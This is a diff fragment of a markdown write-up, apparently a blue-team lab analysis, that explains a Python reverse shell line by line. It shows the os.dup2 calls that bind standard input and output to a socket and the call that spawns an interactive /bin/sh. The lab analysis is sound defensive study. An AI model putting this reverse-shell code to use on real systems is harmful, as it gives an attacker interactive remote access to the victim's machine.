ladybuginthemug/ladybuginthemug.github.io/content/writings/BTLOPortScan.md

 ```
 os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);
 ```
-- Calls /bin/sh (a shell) with the -i flag, which starts an interactive shell.
+- When the code executes /bin/sh the shell inherits the redirections and communicates with the remote user via the socket

 ```
 p=subprocess.call(["/bin/sh","-i"]);